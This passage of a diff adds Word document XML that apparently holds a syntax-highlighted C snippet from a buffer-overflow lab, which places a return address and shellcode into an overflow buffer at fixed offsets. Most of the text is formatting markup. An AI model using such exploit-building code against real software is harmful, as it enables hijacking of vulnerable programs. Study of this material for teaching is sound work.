+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="8000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>long</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>*)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> buffer</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>*(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>tmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>+</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="FF8000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>9</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>returnAddress</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>// Part 2: Filled bytes (done)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>// Part 3: Shellcode</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="8000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>int</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>shellcodeSize</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>strlen</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>shellcode</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="8000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>int</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>shellcodeStart</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="FF8000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>517</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>shellcodeSize</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>strcpy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">buffer </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>+</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>shellcodeStart</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> shellcode</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
